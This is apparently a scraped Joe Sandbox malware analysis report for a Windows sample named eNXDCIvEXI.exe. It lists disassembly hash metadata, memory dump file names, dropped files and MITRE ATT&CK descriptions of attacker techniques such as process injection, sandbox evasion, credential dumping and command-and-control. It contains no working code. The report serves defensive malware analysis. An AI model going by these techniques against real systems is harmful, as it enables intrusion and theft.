Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 599aafb1a2fbac2749585f3fce9e42e0e0929a2fc6439cc2c59c11fe38e88cac
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 309186F0F2421B9BDF24DF69C882ABEB7A6FF44720F18451AE859E72C0D7709A418750

Function 051F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 051F9175
$, xrefs: 051F9191

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 0af4341d3c88573680fdd2ab99ffbcd1920e284af808f010c85e19a43242daca
Instruction ID: 9cf45158ebd0ef2ee6cbf46f0c5815b10fa0f71d62e7b725df16112a2721dd2c
Opcode Fuzzy Hash: 0af4341d3c88573680fdd2ab99ffbcd1920e284af808f010c85e19a43242daca
Instruction Fuzzy Hash: E4812B75D14269DBDB35DB54CC49BEEB7B8AF08710F0041EAAA19B7280D7709E85CFA0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eNXDCIvEXI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_eNXDCIvEXI.exe_89ed3ed2715539152738a54e623dbca95890f373_ab20fede_bf7f9d28-e8cc-473e-8855-8a256eaaf39f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AAF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E89.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EE7.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\2E85-1J297

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31hdcogd.5xh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32e4yub0.p44.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4buer0e.pln.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqco1vmh.xdq.psm1

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

Windows Analysis Report
eNXDCIvEXI.exe

Function 00007FFD9B8905DB Relevance: 9.2, Strings: 7, Instructions: 406
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre